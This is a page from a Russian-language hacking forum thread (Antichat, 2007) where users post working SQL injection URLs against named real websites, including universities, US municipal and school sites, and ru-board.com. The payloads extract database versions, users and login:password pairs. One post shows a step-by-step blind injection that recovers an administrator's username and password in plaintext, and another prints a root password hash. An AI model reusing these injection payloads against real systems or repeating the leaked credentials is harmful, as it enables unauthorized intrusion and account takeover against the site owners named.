ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2301  
Старый 27.05.2007, 18:07
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

5 минут гугла
Цитата:
http://www.michiganbusiness.us/showcompany.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,database(),44,45,4 6,47,48,49,50,51/*
http://haytom.us/showarticle.php?id=-1+union+select+1,2,3,4,5
http://www.fairelections.us/article.php?id=-1+union+select+1,2,3,4,version()/*
http://www.ci.bremerton.wa.us/navigation.php?id=-1'+union+select+1,2,convert(version()+using+latin1 ),4,5,6,7,8,9,10,11,12,13,14/*
http://www.trumansburg.ny.us/org_detail.php?id=43+and+(ascii(substring(user(),1 ,1))%3E0)/*
http://www.conwayschools.afsc.k12.ar.us/parents.php?id=-1+union+select+1,convert(table_name+using+latin7), 3,4+from+information_schema.tables
http://www.gwhs.denver.k12.co.us/newsstory.php?id=22+and+(ascii(substring(user(),1, 1))%3E0)/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #2302  
Старый 27.05.2007, 18:42
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://bla-bla-bla.ru/borrow/?s=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #2303  
Старый 27.05.2007, 19:11
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Фуф. Вот ещё 1 .edu и 1 .net
Код:
http://bgkulinar.net/news.php?&newsid=-1358+union+select+version()/*
http://colab.hunter.cuny.edu/colabcms/event_info.php?eventID=-18+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13/*
 
Ответить с цитированием

  #2304  
Старый 27.05.2007, 19:16
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://iwf.ru/main/top.php?id=-2+union+select+1,2,concat(username,char(58),password),4+from+users+where+user_id=1/*
 
Ответить с цитированием

  #2305  
Старый 27.05.2007, 19:25
Аватар для Boccob
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Парк активного отдыха "Якутские горы"
Цитата:
http://www.yago.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3 a,database(),0x3a,version()),11,12/*&show=8
з.ы. антибоян кто-нибудь обновляет вообще??
 
Ответить с цитированием

  #2306  
Старый 27.05.2007, 19:31
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Антибоян обновляеться раз в 14 дней

Заодно несколько иньекций
Код:
http://www.ardi.ee/lanordia/index.php?id=-10+union+select+1,concat(login,char(58),password)+from+users/*
Код:
http://www.ivek.ee/news/news.php?mode=normal&id=-127+union+select+1,concat(login,char(58),password),3,4+from+users/*&lang=est
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 27.05.2007 в 21:35..
 
Ответить с цитированием

  #2307  
Старый 28.05.2007, 00:40
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

TOP 10 [SQL INJ] edu! for KPOT_f1nd

Код:
http://www.chemistry.montana.edu/news.php?id=19+union+select+1,2,3,4,5,6,7/*

http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,concat(user(),char(58),version()),4,5,6,7,8/*

http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*

http://www2.umaine.edu/graduate/news.php?id=19'+union+select+1,concat(user(),char(58),version()),3,4/*

http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

http://www.physics.hmc.edu/news.php?id=21+union+select+1,2,3,4,5/*

http://www.csun.edu/~humndean/cgi-bin/news.php?id=-118+union+select+1,2,concat(user(),char(58),version()),4,5/*

http://acd.edu/news.php?id=5'+union+select+1,2,3,4,5/*

http://www.informatics.indiana.edu/news/news.asp?id=-156+union+select+1,concat(user(),char(58),version()),3,4,5,6/*

http://www.bellarmine.edu/athletics/news.asp?id=1 or 1=@@version--
 
Ответить с цитированием

  #2308  
Старый 28.05.2007, 00:45
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://live.ece.utexas.edu/People/people_detail.php?id=-97+union+select+1,database(),3,version(),password,user,7,user(),9,10,11,12+from+mysql.user/*
root:327cc28f2c9db092
me lost :[
 
Ответить с цитированием

  #2309  
Старый 28.05.2007, 03:18
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://ru-board.com/new/categories.php?op=newindex&catid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Вывода нет. Возможно, в каком то поле хранится ссылка на файл со статьей...
Код:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring(version(),1,1)))=0x34/*
MySQL 4.x
 
Ответить с цитированием

  #2310  
Старый 28.05.2007, 04:33
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Вот немного покопался глубже:

Код:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=103/*
g
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=111/*
o
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=100/*
d
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=0/*

user: god

http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=102/*
f
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=101/*
e
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=52/*
4
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),5,1)))=53/*
5
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),6,1)))=116/*
t
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),7,1)))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),8,1)))=115/*
s
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),9,1)))=119/*
w
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),10,1)))=51/*
3
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),11,1)))=0/*

password: fre45trsw3
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ